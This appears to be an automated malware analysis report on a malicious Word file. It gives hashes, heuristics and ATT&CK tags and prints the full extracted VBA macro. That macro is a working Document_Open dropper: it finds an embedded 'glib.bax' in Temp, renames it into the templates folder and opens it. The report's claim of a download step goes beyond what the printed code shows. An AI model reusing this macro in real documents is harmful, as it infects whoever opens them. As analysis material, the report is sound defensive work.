Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d387bb7970545808…

MALICIOUS

Office (OLE)

Size: 451.0 KB
Created: 2021-08-25 09:12:00
Authoring application: Microsoft Office Word
First seen: 2021-09-13
MD5: 912d4577fff64d062e613da735f17991
SHA-1: 1dea29b7e9639ced1f5713b77a53d063c44dffc2
SHA-256: d387bb7970545808dc199de51b482ccb4faf5e8e1df678bc9116a81d51b0bc32
Risk Score: 72

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro that triggers on Document_Open. The macro attempts to create a file named 'glib.doc' in the user's template directory and likely uses it to download and execute a secondary payload. The presence of the Document_Open macro and the embedded VBA code strongly suggests a macro-based attack vector.

Heuristics (5)

  • Office EPRINT stream contains EMF object
    Severity: high (CVE related). Rule: OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is evidence of Office object delivery when paired with exploit-payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • VBA macros detected
    Severity: medium (1 related finding). Rule: OLE_VBA_MACROS
    Document contains VBA macro code.
  • Document_Open macro
    Severity: low. Rule: OLE_VBA_DOCOPEN
    Document_Open macro. Matched line in script:
    Private Sub Document_Open()
  • Suspicious extracted artifact
    Severity: info. Rule: EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL
    Severity: info. Rule: EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/2006/encryption (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/password (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/certificate (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Each artifact is listed with its filename, kind, source, size and SHA-256.

macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source)
  Size: 2889 bytes
  SHA-256: a74bdcba8c38c815f85b08988cb21bf0c5691c4077bcd41a1588a0676b3edd6e
Preview (script): first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
        Dim hdv As String
        Dim bbbb As String
        Dim med As String
Private Sub Document_Open()
Dim vcbc As String
 
Dim dfgdgdg


vcbc = Options.DefaultFilePath(wdUserTemplatesPath)


If Dir(vcbc & "\glib.d" & "o" & "c") = "" Then
 Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
    Call bvxfcsd

If Len(hdv) > 2 Then

Call nam(hdv)

    Call pppx(vcbc & "\glib.d" & "o" & "c")

    ActiveDocument.Close
End If
End If
End Sub




Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject


Call Search(MyFSO.GetFolder(asda), hdv)

End Sub


Attribute VB_Name = "Module1"
Sub sad()
msi = 0
End Sub

Sub pppx(spoc As String)
    Documents.Open FileName:=spoc, ConfirmConversions:=False, ReadOnly:= _
        False, AddToRecentFiles:=False, PasswordDocument:="123321", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub



Sub ousx()
Call uoia(Options.DefaultFilePath(wdUserTemplatesPath))
End Sub



Attribute VB_Name = "Module3"

Sub bvxfcsd()
Dim uuuuc
uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)
Dim ewrwsdf As String
ewrwsdf = "Loc" & "a" & "l/"

ewrwsdf = ewrwsdf & "Temp"
 
    ntgs = 50
sda = 49
Dim kuls As String
kuls = ewrwsdf
While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & ewrwsdf)
End Sub





Attribute VB_Name = "Module123345"
Dim pls As String


 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object
  Dim fffff
  fffff = "glib.b" & "ax"
   For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc
Dim Ters As Object
   For Each Ters In mds.Files
   
   If Ters.Name = fffff Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub

Sub nam(pafs As String)
Call ousx
Dim oxl
oxl = "\glib.d" & "o" & "c"
Name pafs As pls & oxl
End Sub

Sub uoia(fffs As String)
pls = fffs
End Sub
ole10native_00.bin
  Kind: ole-package
  Source: OLE Ole10Native stream: ObjectPool/_1691362078/Ole10Native
  Size: 276271 bytes
  SHA-256: d97e1e998dea052aa0b0e2af8f0a6b90de6775efb7d1668d63c800d959f6a2f6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
ole10native_00_glib.bax
  Kind: ole-package-payload
  Source: OLE Ole10Native payload: ObjectPool/_1691362078/Ole10Native
  Package metadata: display_name=glib.bax; full_path=C:\Users\MyPc\AppData\Local\Temp\glib.bax; temp_path=; def_file=
  Size: 275968 bytes
  SHA-256: 7d449914b605c5d48ee6a62e2a3989aebef808dc6fe5c5901a204e595a0558eb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.